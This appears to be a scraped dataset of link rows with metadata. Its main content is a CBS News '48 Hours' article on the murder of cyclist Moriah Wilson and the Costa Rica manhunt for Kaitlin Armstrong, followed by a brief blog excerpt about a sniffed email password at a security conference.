Want to comment on our stories or respond to others?Join the conversation by subscribing now. Only paid subscribers can add their thoughts or upvote/downvote comments. Our commenting policy can be viewed here. | true | true | true | Shelby County Health Department threw out 1,315 doses of COVID-19 vaccine that expired during the snow days. | 2024-10-12 00:00:00 | 2021-02-19 00:00:00 | https://thememphian.blob.core.windows.net/sized/48833_1200 | website | dailymemphian.com | The Daily Memphian | null | null |
24,568,991 | http://davidyyang.com/pdfs/revolutions_draft.pdf | null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
8,421,329 | http://www.nytimes.com/2014/10/04/business/justices-weighing-wages-for-after-work-screenings-.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
22,970,367 | http://www.vishalchovatiya.com/7-best-practices-for-exception-handling-in-cpp-with-example/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
4,076,625 | https://www.nytimes.com/2012/06/07/arts/video-games/nintendos-coming-game-system-wii-u.html?pagewanted=all | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
39,191,661 | https://www.cbsnews.com/news/kaitlin-armstrong-anna-moriah-mo-wilson-cyclist-murder-48-hours/ | How was fugitive Kaitlin Armstrong caught? She answered U.S. Marshals' ad for a yoga instructor | Jonathan Vigliotti | # How was fugitive Kaitlin Armstrong caught? She answered U.S. Marshals' ad for a yoga instructor
Kaitlin Armstrong is serving 90 years in prison for murdering professional up-and-coming gravel cyclist Anna Moriah "Mo" Wilson. It's a story that drew international headlines because after being suspected of killing Wilson in Texas, Armstrong vanished -- seemingly into thin air. The search for the suspected killer sparked what would become an international manhunt -- first leading authorities across the United States, and then eventually to the beaches of Costa Rica.
In June 2022, one month after Armstrong disappeared, Deputy U.S. Marshals Damien Fernandez and Emir Perez traveled to Costa Rica. A source told them Armstrong could be hiding out in Santa Teresa. They knew finding Armstrong in the small, tourist-filled village was going to be a challenge -- along the way, Armstrong used multiple identities and changed her appearance -- even getting plastic surgery.
They hit dead end after dead end. After many intense days of searching for Armstrong with no luck, the U.S. Marshals decided to try one last tactic, hoping that her love of yoga would pay off for them.
"We decided we were gonna put an ad out … or multiple ads for a yoga instructor and see -- what would happen," Perez told "48 Hours" contributor Jonathan Vigliotti.
But after almost a week of hunting, even that didn't seem to be working. Perez and Fernandez were about to head back to the States, when suddenly they got a break.
## CYCLIST MO WILSON WAS FORGING HER OWN PATH
In March 2022, up-and-coming pro gravel bike racer –25-year-old Anna Moriah Wilson, known as "Mo" to some, appeared on the "Pre Ride Show," an online program about cycling.
MORIAH WILSON ("Pre Ride Show interview): So excited to be here. It feels like the first big race of the year so yeah … I'm ready to kick it off."
Just two months later, Wilson was found murdered -- the news shocking the cycling community.
**Lisa Gosselin Lynn**: I don't think anybody could really believe it at first. You know, why would anybody wanna hurt or harm or kill this lovely, talented young woman?
Lisa Gosselin Lynn is the editor of Vermont Sports Magazine and Vermont Ski and Ride Magazine. She is also a CBS News consultant.
Lynn had been following Wilson's career for many months before her tragic death.
**Lisa Gosselin Lynn**: Moriah was pretty much winning every race that she entered, winning or finishing in the top two. And the races that she entered were top tier.
**Lisa Gosselin Lynn**: Moriah had the potential to be one of the top bike racers, definitely in the country, and probably in the world.
Remarkably, Lynn says that Wilson was new to the pro cycling world. Her first passion had been downhill ski racing, * *a love shared by her close-knit family.
**Lisa Gosselin Lynn**: She was born into a family of really great athletes. Her father Eric had been on the U.S. Ski Team. … and Moriah's aunt … actually was a two-time Olympic Nordic ski racer.
And it's no surprise that Wilson was drawn to outdoor endurance sports. She was raised in northern Vermont next to Kingdom Trails, a mecca for skiers and mountain bikers.
**Lisa Gosselin Lynn**: And that was her playground.
Wilson attended Burke Mountain Academy, an elite ski school that produced Olympic greats like two-time Gold medalist Mikaela Shiffrin. Wilson had hoped to make the U.S. Ski Team, but knee injuries eventually ended her skiing career. That's when she switched sports.
**Lisa Gosselin Lynn**: She had used cycling as a way for rehabbing and kind of building back her strength. What was fascinating to me was she then went on to Dartmouth. She got an engineering degree. And after doing that, she went to her mother and said, "Hey Mom, I think I want to be a professional cyclist."
And Wilson told the "We Got to Hangout" podcast that she wanted to do much more than just win races.
MORIAH WILSON ("We Got to Hangout"interview): How can I inspire people? How can I give back to the cycling community? How can I bring more people into the sport? How can I make it more inclusive? … I wanna find meaning and purpose in cycling that goes like far beyond the result.
Wilson eventually moved to San Francisco where she focused on cycling, and quickly rose to the top of the sport.
**Lisa Gosselin Lynn**: Moriah was forging her own path. … She knew what she wanted to do. And she was working hard to pursue it.
On May 10, 2022, just one week before her 26th birthday, Wilson arrived in Austin, Texas, to prepare for the Gravel Locos bike race — a race she was favored to win. Wilson stayed with a close friend in her Austin apartment. But the next evening, just before 10 p.m., the friend returned home and discovered Wilson, who had been shot multiple times. She called 911.
CAITLIN CASH | 911 call: ... she's laying on the bathroom floor and there's blood everywhere.
Wilson's friend tried CPR, but it was too late.
**Det. Marc McLeod**:** **It sounded like it started off near the door … and went backwards. Like she was trying to get away or there was some sort of struggle.
Austin Police Officers Marc McLeod* *and* *Jonathan Riley worked the case from the beginning.
**Det. Marc McLeod**: Whoever shot her at that point stood over top of her and shot her at least once.
Investigators wondered who could have murdered this promising young athlete. As they canvassed the immediate area, police discovered a possible clue. Wilson's expensive racing bicycle had been discarded in the bushes.
**Det. Jonathan Riley**: So, at that point … OK. Is this a burglary, a robbery gone wrong?
But that theory was quickly dismissed because there was no sign of a break-in. Then, police learned that just hours before Wilson was found murdered, at around 8:30 p.m., she had been dropped off by another professional bike racer named Colin Strickland.
**Det. Marc McCloud**: So, obviously the focus would be … who's this Colin Strickland?
**Lisa Gosselin Lynn**: Colin Strickland was a very good gravel racer. … He was at the top echelon.
Colin Strickland, who was 35, was considered a pioneer in the sport. He had won some of the most prestigious races and was sponsored by the industry's top brands, like Red Bull.
In 2020, he appeared in an online video called Wahoo Frontiers about his long and successful career.
COLIN STRICKLAND (Wahoo Frontiers video): My name is Colin Strickland and I'm a bicycle racer and a general entertainer.
**Chris Tolley**: Pretty early on I looked up to Colin when I was coming up on the scene.
Chris Tolley is friends with Strickland. They met on the racetrack.
**Chris Tolley**: He was the one to beat. … He loved to kind of create a show around bike racing — kind of selling bike racing. He was really passionate about it.
And Tolley said although his friend had been popular with women, he eventually became serious with a woman named Kaitlin Armstrong.** **However, in a social media post after the** **crime, Strickland wrote that about six months before Wilson's murder, during a short breakup with Armstrong, he did have a "brief romantic relationship" with Wilson that "spanned a week or so." He said that it ended, and their relationship had turned into a "platonic and professional one."
**Chris Tolley**: He just wanted to be friends with, like, someone who was going to do great things in cycling.
The day after Wilson's murder, police visited and spoke to Strickland at his home.
**Det. Marc McLeod**: My … my personal take was he was being very cooperative, being very forthcoming. Um, obviously he was in shock.
**Jonathan Vigliotti**: Being very transparent.
**Det. Marc McLeod**: Very transparent. Yeah.
And investigators say, when he agreed to go down to the police station to be interviewed, he didn't seem to hold back when telling them about the day he spent with Wilson — a day that would end up being her last.
That day in May was hot, in the 80s. And this story started with a swim at a local outdoor pool. Strickland told detectives he took Wilson there on the back of his motorcycle to cool off.
**Det. Marc McLeod**: They went swimming, then they got food.
Wilson and Strickland are seen on the restaurant's security camera.
**Jonathan Vigliotti:** I know he's being transparent at this point during this questioning, but what he's saying is starting to sound a lot like a date.
**Det. Jonathan Riley**: Yes.
**Det. Marc McLeod**: Oh yeah. A hundred percent.
Investigators had a lot of questions and their prior visit to Strickland's home had raised even more. On the night of Wilson's murder, police discovered an important clue on video from a neighbor's security camera. The video was taken just one minute after Wilson was dropped off.
**Det. Marc McLeod**:** **There's a video from a Ring doorbell camera that clearly shows like a black SUV with a bike rack. … You can't see the license plate because of the bike rack on it.
**Det. Jonathan Riley**: So, it was obviously … we need to focus on this.
And a vehicle that fit that description was outside Strickland's house. Who was driving the black Jeep SUV with the bike rack? The answer would lead directly to another woman.
## WHO IS KAITLYN ARMSTRONG?
The day after Wilson's murder, investigators quickly had an answer to who could have been driving that black Jeep that was seen on security cameras shortly before her death.
Investigators had spotted a similar looking Jeep in Strickland's driveway when they spoke to him.
**Det. Jonathan Riley**: They see a black Jeep with the bike rack on the back of it. **… **so at that point we run the license plate, and it comes back that it's registered to Kaitlin Armstrong.
Kaitlin Armstrong, Colin Strickland's girlfriend. Tolley says he knew her very well.
**Chris Tolley**: We connected pretty early on. … Kaitlin and I became friends.
They were both from the Midwest.
**Chris Tolley**: We kinda had a similar — like, upbringing, and so I think that kind of — you know, help us become, like, even better friends. … She'd come over to parties I would have.
Armstrong had a background in finance and loved yoga.
**Chris Tolley**: She had a really strong, you know, kind of — you know, love for travel, love — you know, she had spent time pretty much, you know, globe-hopping around the world … really, you know, a kind of interesting person.
Armstrong got certified as a yoga instructor in Bali. After she met Strickland in 2019, she also started getting into cycling.
**Chris Tolley**: He was very willing to kind of show her, you know, what his passions were and how passionate he was for cycling and, you know, get her involved with it **… **and she also became … kind of addicted to cycling, along with Colin.
Armstrong even started racing on an amateur level.
**Chris Tolley**: At the end of the day, like, I feel like they had a pretty, like, normal relationship. They both ride bikes together. They would, you know, do fun stuff. And, you know, then 2020 happened and the pandemic started. So everyone was kind of, you know, forced with – you know, close quarters with their significant others.
The couple eventually moved in together.
**Chris Tolley**: The moment I — I saw the relationship become more serious is you know, they talked about — that they'd purchased a house recently — together, which I thought, you know, was a pretty big indication that it's — you know, a serious relationship.
They also started a business together, restoring classic trailers.
**Chris Tolley**: I think she was helping with the finance side of things. Colin was doing a lot of the operations. … their relationship went from, you know, just a — normal couple to also owning a business together.
But things got bumpy in late 2021.
**Chris Tolley**: The breakup, I personally didn't know, like, they were split up at the time. … neither of them mentioned anything to me.
It was during this time that Strickland and Wilson had briefly dated. Although Strickland had said that they had broken it off, Wilson seemed confused in the aftermath. Pilar Melendez covered the case for the Daily Beast.
**Pilar Melendez | Daily Beast senior reporter**:** **Around this time, I think Mo was pretty confused about the status of her relationship with Colin. … and she literally wrote:
...This weekend was strange for me…
...If you just want to be friends…that's cool,
…Honestly…my mind has been going in circles…
** Pilar Melendez**: it sounds like someone who's in their early 20s who just wants to know the status of her relationship with someone that's confusing her. And it seems totally reasonable that she might be confused.
Strickland had a lot to say about his relationship with Armstrong.
**Det. Marc McLeod**: He starts to portray her as being the jealous type, even saying things like," I can't keep people in my phone." Like "Mo's not in my phone as Mo."
Strickland told investigators he kept Wilson's phone number under an alias in his contacts, and on that evening after he'd been out with Wilson at the pool, he texted Armstrong that he'd been out running an errand and that his phone had died. That was not true.
Investigators say, there were other clues pointing toward Armstrong.
**Det. Jonathan Riley**: … on the night of the murder, Kaitlin Armstrong's phone was not connected to a cell network.
**Jonathan Vigliotti**: Not connected?
**Det. Jonathan Riley**: Correct. So, whether she powered it off, whether she put in an airplane mode, uh, there's some something happened that her phone was not communicating with any cellphone towers.
**Jonathan Vigliotti**: Do you think this was on purpose?
**Det. Jonathan Riley**: Absolutely … in this day and age, if your phone is off and not connected to a network, you're either the victim of a crime or you're probably committing one.
**Jonathan Vigliotti**: A silent phone speaks louder in some cases than actions.
**Det. Jonathan Riley**: Oh, absolutely.
Strickland also shared that he had bought handguns for Armstrong and himself for personal security
**Det. Marc McLeod**: He talks about how they purchase guns.
**Det. Marc McLeod**: And that there are these two guns and that she has a gun, um, they've taken lessons and that those — these guns are back at the house.** **And so few things like that start to paint a picture of like, this could — it could definitely be her
Police worked quickly. That same day, investigators picked Armstrong up on an old warrant for failing to pay for a Botox treatment.
DETECTIVE CONNER: ... what were you doing yesterday?
KAITLIN ARMSTRONG: I would like to leave.
**Det. Marc McLeod**: And she's just kind of sitting there and she's not showing very much emotion at all. … typically when we see some interviews going on and if you didn't do it, this is your, like, you're going to be like, you know, not me, not it. I want out of this room. What do you want to know? … So that you don't come back looking for me. And there was none of that.
DETECTIVE CONNER: Is there any explanation as far as why the vehicle would be over there?
KAITLIN ARMSTRONG: I would like to leave ...
**Det. Jonathan Riley**: She was almost completely disinterested in — in hearing what the detectives had to say.
**Jonathan Vigliotti**: So, it sounds like this is a big red flag immediately?
**Marc McLeod**: Oh —
**Jonathan Riley**: Oh, absolutely.
But investigators had to let Armstrong go. There was a problem — Armstrong's birthdate didn't match the date on the warrant, so the warrant wasn't valid, and police didn't have enough to charge her with anything else.
Two days after that interview, police got an unexpected call. It was from a friend of Armstrong. Police say the caller told them that Armstrong was so angry about Strickland's relationship with Wilson, that she wanted to kill her. It was yet another indication that they were on the right track. A few days later, an arrest warrant was issued, but when police went looking for Armstrong, she was gone.
## ON THE HUNT FOR KAITLIN ARMSTRONG
After Kaitlin Armstrong vanished, U.S. Marshals got the job of tracking her down.
**Chris Godsick**: Plain and simply the Marshals are man hunters.
Chris Godsick hosts and produces a podcast with the U.S. Marshals Service.** **His "Chasing Evil" podcast tells stories of some of the Marshals Service's biggest cases, including the hunt for Armstrong.
**Chris Godsick**: Nobody thought Kaitlin Armstrong was going to run and she surprised them all. She disappeared.
"CHASING EVIL" PODCAST: Kaitlin Armstrong ran from a murder charge. … But the U.S. Marshals Lone Star Fugitive task force had a different plan …
**Jonathan Vigliotti**: So take me through this. … Where do you begin when you're looking for somebody that does not want to be found?
**Deputy U.S. Marshal Emir Perez**: You know, it depends on the case, honestly. … we look for friends, sometimes we look for … family.
**Deputy U.S. Marshal Damien Fernandez**: One of the things that I did was collect as many photos as I could.** **
Damien Fernandez and Emir Perez are Deputy U.S. Marshals. They joined Austin Police Officers Jonathan Riley and Marc McLeod on the case. The team, based in Texas, is known as the Lone Star Fugitive Task Force.
With no sign of Armstrong, the task force suspected she may have left town headed for her sister Christie's place in upstate New York.
**Det. Marc McLeod**: We were thinking maybe she's driving cross country. We didn't know.
Their instincts were right. In upstate New York, another Deputy U.S. Marshal managed to track down Armstrong's sister.
**Jonathan Vigliotti**: What did the sister say?
**Deputy U.S. Marshal Emir Perez**: The sister ultimately said … that her sister had come to visit her … and stayed with her a couple of days, but that she had dropped her off at the airport in Newark. And last she heard, she was gonna board a flight back to Austin, but then called her back later and said that she decided that she was gonna drive back.
**Det. Marc McLeod**: … which made absolute -- no sense to any of us that you would just drive back.
When the task force checked outbound flights at Newark Airport, no reservations had been made in Kaitlin Armstrong's name.
**Det. Marc McLeod**: We never got a hit on Kaitlin Armstrong's passport.
But the team had a hunch because Christie Armstrong told the Deputy U.S. Marshal in New York that she didn't know where her passport was. So they checked with their contact at Homeland Security.
**Det. Jonathan Riley**: And within minutes of reaching out to him, he got back to me and he's like, yeah, we're showing Christie Armstrong traveled out of Newark, New Jersey, International Airport on a one-way flight to Costa Rica
**Jonathan Vigliotti**: You knew it.
**Emir Perez**: I said, there's no way that the sister left. And we're looking for her and we can't find Kaitlin. No, that's Kaitlin.
The U.S. Marshals suspected that Kaitlin Armstrong has used her sister's passport to flee. Christie Armstrong later emphasized to authorities that she did not give her sister the passport. She has never been charged with any crime related to the case.
Kaitlin Armstrong landed in Costa Rica, the gem of central America and home to mountains, tropical rain forests and white sand beaches as far as the eye can see.
But she didn't spend much time in San José. Shortly after arriving, Armstrong disappeared again — and she had a huge lead on the U.S. Marshals. Perez and Fernandez arrived in Costa Rica a month after Armstrong.
**Jonathan Vigliotti**: This is you guys now on the hunt. How intense is it once you touch down in Costa Rica? What happens?
**Deputy U.S. Marshal Damien Fernandez**: You're on a timeline.
**Jonathan Vigliotti**: I hear timeline and I hear the pressure is on —
**Deputy U.S. Marshal Damien Fernandez**: Pressure's on. I know we were sitting in the plane and we're talking, what's the game plan?
Although they would have help from the Costa Rican authorities and U.S. State Department officers on the ground, they knew finding Armstrong was going to be a big challenge.
**Deputy U.S. Marshal Emir Perez**: We had other intelligence indicating that … she was staying in hostels in Costa Rica. And I don't know if you know anything about Costa Rica, but Costa Rica has a lot of hostels, a lot, an unbelievable amount of hostels.
The U.S. Marshals wouldn't tell "48 Hours" exactly how their intelligence gathering worked, but their team back in the States had managed to track down the phone number for an American businessman they believed had connected with Armstrong at some point.
**Det. Marc McLeod**: We didn't know what city he was in. So we decided, hey, let's just cold call him. … So we call him. And we're on the conference room and he answers. And we're like, "Hey, it's the U.S. Marshals. My name is Marc." And he goes, "I don't want any," click just hangs up. Like it's a — like a —
**Jonathan Vigliotti**: A telemarketer.
**Det. Marc McLeod**: Yeah. A telemarketer.
**Det. Jonathan Riley**: Right. Or a scam call.
After three or four call attempts, the businessman finally stayed on the line to answer the U.S. Marshals' questions.
**Det. Marc McLeod**: And we actually ended up sending a picture of Kaitlin … while we're on the phone with him. He looks at it and he goes, yes, but she doesn't look like that and she's not using that name.
**Jonathan Vigliotti**: And did he tell you her new name?
**Det. Marc McLeod**: He did.
**Det. Jonathan Riley**: It was Beth.
**Det. Marc McLeod**: Beth.
**Det. Jonathan Riley**: She was going by Beth.
**Jonathan Vigliotti**: Going by Beth.
And the businessman said Armstrong no longer looked like her photo. She had cut her hair and changed its color.
**Det. Jonathan Riley**: It was brown hair instead of red.
**Emir Perez**: Yeah, she dyed her hair.
The businessman told the U.S. Marshals he had no idea that the woman who called herself Beth was actually Kaitlin Armstrong, but he did tell them where they might find her.
**Det. Marc McLeod:** He's like, "Well, I met her at a yoga studio in Jacó."
Jacó is a popular tourist destination known for its nightlife and its beaches and the perfect place to hide. It was the U.S. Marshals' first real tip, so they rushed there.
They canvassed the area, combed through hours of surveillance video, but could not find a single sign of Kaitlin Armstrong anywhere. It was a bust.
**Chris Godsick**: … but the Marshals have one more solid lead and that takes them to a beautiful touristy beach town— a one-street town called Santa Teresa.
## WAS KAITLIN ARMSTRONG HIDING IN PLAIN SIGHT?
One month after Kaitlin Armstrong disappeared, the U.S. Marshals were in hot pursuit of her in another area of Costa Rica. A source had suggested she might have gone to a small village on the Pacific coast.
The U.S. Marshals took a ferry to reach a remote peninsula. Once there, they drove by car through mountains to the tiny town of Santa Teresa. But when they finally arrived, they ran into an unexpected problem.
**Jonathan Vigliotti**: … you get to Santa Teresa. … Was it easy to identify her there from the other people that were there?
**Deputy U.S. Marshal Damien Fernandez**: I think from the get-go we were told … you're gonna be in for a surprise 'cause a lot of the women in Santa Teresa look just like Kaitlin — a lot of them.
And it turns out, that advice was right. The town was full of foreign tourists. Deputy U.S. Marshals Fernandez and Perez arrived in Santa Teresa after dark.
**Deputy U.S. Marshal Emir Perez**: So, we get there, and he starts walking down a main strip that's there, uh, like down the street.
**Deputy U.S. Marshal Damien Fernandez**: There's only one road on — on that town.
**Deputy U.S. Marshal Emir Perez**: And he sees —
**Deputy U.S. Marshal Damien Fernandez**: Main road.
**Deputy U.S. Marshal Emir Perez**: He sees a girl and he says, you know, that looks just like her. Well, a couple minutes later, we see another one. And it's late at night and we're like, whoa, oh, man, that's two. … And then there's another one.
As the U.S. Marshals tried to find Armstrong, they even had one of their female operatives start going to yoga classes to see if they could spot her.
**Deputy U.S. Marshal Damien Fernandez**: She actually did three different classes for us.
And they tapped into local contacts.
**Deputy U.S. Marshal Damien Fernandez**: Oh, yeah. We made friends with people there that would send us pictures. Oh look, I — I think I saw her at this restaurant yesterday and she's in the back in the background of a photo that I took, stuff like that.
In fact, people had seen Armstrong at local spots in Santa Teresa, but they didn't realize who she was. Armstrong was hiding in plain sight using different names.
**Jonathan Vigliotti**: She had like multiple names.
**Greg Haber**: Yeah. Um, she came in —
**Man in restaurant**: Beth?
**Greg Haber**: Um —
**Jonathan Vigliotti** Beth?
**Greg Haber**: It wasn't Beth.
**Woman in restaurant**: Ari?
**Greg Haber**: Ari.
**Jonathan Vigliotti**: Ari.
**Greg Haber**: Ari, right. So she came in as Ari.
Greg Haber is an American from the New York area who owns a restaurant called Kooks Smokehouse and Bar in Santa Teresa.
**Jonathan Vigliotti**: Ari. What did Ari look like? Did she stand out to you?
**Greg Haber**: Pretty, came in, um, you know, introduced herself as a yoga teacher, which is basically anybody else down here … "hey, I moved here, teaching yoga down the street" ... and that was it.
**Jonathan Vigliotti**: What was her general vibe like?
**Greg Haber**: She definitely seemed like she was trying to establish roots here. Like this was gonna be her new home.
And Haber says one day he noticed something different about her.
**Greg Haber**: I saw her on the beach. … I walk my dog on the beach every night for sunset. … And you're walking through, and you see the bandage on her face. It's like, "Oh, what happened?" She's like, "Oh, surfboard hit me in the face."
**Greg Haber**: It's like, well, happens to everybody, right, at least once. So, you wouldn't even question that story here. Like, you see people all the time.
Turns out that bandage would later prove to be an important part of this story — and one of the reasons the U.S. Marshals say Armstrong was so hard to find.
**Jonathan Vigliotti**: So, you're this close to giving up.
**Deputy U.S. Marshal Damien Fernandez**: Yes.
Finally, they decided on one last tactic: they turned to a local Facebook page.
**Deputy U.S. Marshal Emir Perez**: We decided we were gonna put an ad out, for a yoga instructor and see what would happen.
**Jonathan Vigliotti**: So this is the equivalent of Craigslist.
**Deputy U.S. Marshal Emir Perez** Yes, correct. Right. Pretty much.
**Deputy U.S. Marshal Damien Fernandez**: A little bit more lively, but yes. … And just saying, hey, we're at this hostel, we're looking for a yoga instructor as soon as possible. Please contact us at this number.
But after almost a week of hunting, even that didn't seem to be working.
**Deputy U.S. Marshal Damien Fernandez**: Sunday, we decided we haven't gotten any response back from anything.
**Deputy U.S. Marshal Emir Perez**: Nothing. We're burned.
**Deputy U.S. Marshal Damien Fernandez**: So, Sunday we're like, OK, we're done. … None of 'em have panned out. So —
**Deputy U.S. Marshal Emir Perez**: We're going back to *San José*
Now back in *San José*, the U.S. Marshals were getting ready to head home when suddenly —
**Deputy U.S. Marshal Emir Perez**: We got a bite, somebody that, um, identified herself … as a yoga instructor and said they wanted to meet with us at a particular hostel … and we said … "this is, this is our chance!"
Perez and Fernandez rushed back to Santa Teresa just ahead of a tropical storm.
Tourism Police Lieutenant Juan Carlos Solanos' team helped the U.S. Marshals in their search for Armstrong. They did surveillance on a hostel called "Don Jon's" where the yoga instructor — the one who answered that online ad — was believed to be.
**Jonathan Vigliotti **(to Solano in Costa Rica): So, there is this massive international manhunt, and of all places in the world, it ends in this very discreet hostel.
**Lt. Juan Carlos Solano**: Sí, aquí se ubicó, ella estaba hospedada acá. (*Translation: Yes, this is where she was staying, she was staying here*.)
It was now time for the U.S. Marshals to make their move.
They decided that Deputy U.S. Marshal Perez would approach the woman alone. They didn't want to scare her off. He would pretend to be a tourist and try to get a really good look at her face.
**Deputy U.S. Marshal Emir Perez**: So I walked up … and I got in.** **And I saw two individuals sitting there at a table, off to the left, as soon as I walked in.
He says one was a woman.
**Deputy U.S. Marshal Emir Perez**: She looked like Kaitlin, but not 100 percent. … So I thought, well, how can I approach her or get close enough where I start asking questions where she doesn't suspect something, So, I decided that I was gonna speak to her in Spanish. So I spoke to her in nothing but Spanish.
**Jonathan Vigliotti**: So, you're communicating, she goes to use her phone for Google Translate and then –
**Deputy U.S. Marshal Emir Perez**: So, I got a little closer 'cause I saw that she was trying to get to Google Translate on her phone and she'd raised it up to me and I got even closer.** …** And I noticed that she had a bandage on her nose and possibly her lips were swollen. and I saw her eyes … The eyes are the exact same ones that I saw in the picture. And this is her 100 percent.
**Deputy U.S. Marshal Damien Fernandez**: He gets in the car, and he is like, "That's her. She's in there."
Local police moved in to make the actual arrest. And soon the U.S. Marshals discovered why Armstrong had been so hard to find: she had been getting plastic surgery when they first arrived in Santa Teresa.
At the hostel, they found a receipt.
**Damien Fernandez**: The receipt for, surgery.** **
**Jonathan Vigliotti**: Plastic surgery?
**Damien Fernandez**: Plastic surgery.
In side-by-side photos, you can see that Armstrong changed the shape of her nose. The Deputy Marshals said their female operative — the woman they sent to yoga classes to try and find Armstrong — told them Armstrong's new look would have tricked her.
**Deputy U.S. Marshal Damien Fernandez**: She told me, I think if I would've run into her at the yoga studio doing yoga classes, I don't think I would've recognized her.
**Jonathan Vigliotti**: Wow. It almost worked.
**Deputy U.S. Marshal Damien Fernandez**: It almost worked.
## THE CASE AGAINST KAITLIN ARMSTRONG
The U.S. Marshals took Armstrong back to Texas, where she was charged and held in jail. But just weeks before she was due to stand trial for the murder of Moriah Wilson, Armstrong escaped from custody again.
**Pilar Melendez**: She was at a doctor's appointment and tried to escape as they were walking out.
Pilar Melendez from the Daily Beast says Armstrong didn't get far before deputies caught her.
**Pilar Melendez**: It was pretty astonishing that she did that given the fact that she had tried to escape prosecution prior.
**D.A. José Garza**: This was just more evidence of her guilt.
José Garza is Travis County's district attorney. He says his team of prosecutors — Rickey Jones and Guillermo Gonzalez — were more than ready to try the case.
**D.A. José Garza**: When we learned that she had tried to escape, it just added to our confidence level in the facts of this case … that we would be able to secure justice for Moriah and her family.
On Nov. 1, 2023, Armstrong's trial began.
RICKEY JONES | Prosecutor (opening statement): The last thing Mo did on this earth was scream in terror.
In opening statements, Jones told the jury about chilling audio from a security camera that
captured the last moments of Moriah Wilson's life.
RICKEY JONES (opening statement): Those screams are followed by "pow! pow!" Two gunshots. … Kaitlin Armstrong stood over Mo Wilson and put a third shot. Right into Mo's heart.
Prosecutors said Armstrong had been tracking Wilson by using a sports app.
**Pilar Melendez**: Kaitlin, prior to the murder, had been following Mo on the Strava app, which is basically an app that athletes use to track their miles, running, biking … And she knew exactly where she was.
And they said that Armstrong, on the night of the murder, was most likely tracking Colin Strickland, as well.
**Guillermo Gonzalez | Prosecutor**: She did have the ability to monitor his communications. She had access to all of his passwords. She had access to his Instagram account.
**Rickey Jones**: I believe that when Mo sent Colin a text letting him know the address where she was. I believe that Kaitlin Armstrong was at home on Colin Strickland's laptop. … She saw that message.
After murdering Wilson and before leaving the scene, Jones told the jury that Armstrong took Wilson's bike and discarded it in the bushes just yards away from where her Jeep was parked.
**Rickey Jones**: Our belief is that she maybe staged it to look like a robbery or something. Or, another theory is, Mo Wilson's bike is a tool of her trade. It might have been like the bullet shot in the heart. I'm going to shoot you in the heart. I'm going to throw away your bike.
But they said Armstrong made one big mistake: she left her DNA behind on the handlebars and seat of Wilson's bike. And that's not all the evidence prosecutors had against Armstrong. There was that receipt that showed Armstrong had received plastic surgery while hiding out in Costa Rica.
**Rickey Jones**: Everything she does … it's all consistent with trying to evade the authorities.
But when it was the defense's turn, attorney Geoffrey Puryear told the jury there was no direct evidence — including security footage — that actually showed Armstrong was at the scene of the crime.
GEOFFREY PURYEAR (in court): Not one witness saw Kaitlin Armstrong allegedly commit this murder.
Then why would Armstrong flee and hide from authorities? Defense attorney Rick Cofer pointed the finger at Colin Strickland.
RICK COFER (in court): Was she scared? What do you think? Do you think that she may have been concerned a little bit that her boyfriend had killed someone? … Fear results in fight or flight and it was flight.
But Jones said, there was a big problem with this theory because Strickland had nothing to do with the murder of Wilson.
**Rickey Jones**: In fact, at the time of the murder, he was actually on the phone speaking with someone. … it wasn't Colin Strickland.
Armstrong's defense team did not respond to "48 Hours"' request for an interview.
After a two-week trial, it took the jury around two hours to decide Armstrong's fate.
JUDGE (reading verdict):* *We the jury find the defendant Kaitlin Armstrong guilty of the offense of murder …
**Rickey Jones**: As a prosecutor, the first row right behind you is the family … you began to feel their pain and their desire for a just outcome for their loved ones.
One day after her conviction, Armstrong was sentenced to 90 years behind bars.
But before the case came to an end, Judge Brenda Kennedy allowed Caitlin Cash — Wilson's close friend whose apartment she had been staying at and who had found Moriah's body – to take the stand and speak directly to Armstrong.
CAITLIN CASH (in court): So many people in this room have lost so much. … I'm angry at you, at the utter tragic nature, at the senselessness at not being able to hear Mo's voice again. … I feel deep sadness for the road ahead.
Then it was Moriah Wilson's mother's turn.
KAREN WILSON (in court): I hate what you did to my beautiful daughter. It was very selfish and cowardly that violent act on May 11th. It was cowardly because you never chose to face her woman-to-woman in a civil conversation. She would've listened. She was an amazing listener. She would have cared about your feelings.
But despite the pain, Karen Wilson closed with words of love and optimism, because she said that's how Moriah would have wanted it.
KAREN WILSON (in court): You killed her earthly body, but her spirit is so very much alive, and you can never change that.
Today in Kingdom Trails in northern Vermont, a place that was sacred to Wilson, a trail was built in her honor. It's called "Moriah's Ascent."
**Lisa Gosselin Lynn**: Moriah was a Vermonter. She was giving. She was hardworking. She was honest. She was caring. And she came from a wonderful family. And that family really wants that legacy and all of her good qualities to inspire others …
*To honor Moriah, the Wilson family created the **Moriah Wilson Foundation** that promotes healthy living and community building.*
## "48 Hours" Post Mortem podcast
Host Anne-Marie Green, correspondent Jonathan Vigliotti and "48 Hours" field producer Hannah Vair take you inside the case.
*Produced by Chuck Stevenson and Chris Ritzen. Hannah Vair is the field producer. Alicia Tejada is the coordinating producer. Ryan Smith, Jenna Jackson and Cindy Cesare are the development producers. Matthew Mosk is the senior investigative editorial director. Wini Dini, Mike Baluzy, Grayce Arlotta-Berner and Joan Adelman are the editors. Lourdes Aguiar is the senior producer. Nancy Kramer is the executive editor. Judy Tygard is the executive producer.* | true | true | true | When cyclist Anna Moriah "Mo" Wilson was murdered in Texas, U.S. Marshals assigned to the case used a unique tactic to track down her suspected killer in Costa Rica and bring the fugitive to justice. | 2024-10-12 00:00:00 | 2024-01-27 00:00:00 | newsarticle | cbsnews.com | CBS News | null | null |
|
7,191,047 | http://eamann.com/tech/inbox-remove-jquery/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
8,725,493 | http://blogs.wsj.com/digits/2014/12/09/soundclouds-valuation-could-top-1-2-billion-with-new-fundraising/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
14,144,410 | https://medium.springboard.com/the-essential-guide-to-a-stellar-design-portfolio-1913df89ada7 | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
11,746,523 | http://blog.erratasec.com/2016/05/technology-betrays-everyone.html | Technology betrays everyone | Robert Graham | The same thing happened to me at CanSecWest around the year 2001, for pretty much exactly the same reasons. I think it was HD Moore who sniffed my email password. The thing is, I'm an expert, who writes tools that sniff these passwords, so it wasn't like I was an innocent party here. Instead, simply opening my laptop with Outlook running the background was enough for it to automatically connect to WiFi, then connect to a POP3 server across the Internet. I thought I was in control of the evil technology -- but this incident proved I wasn't.
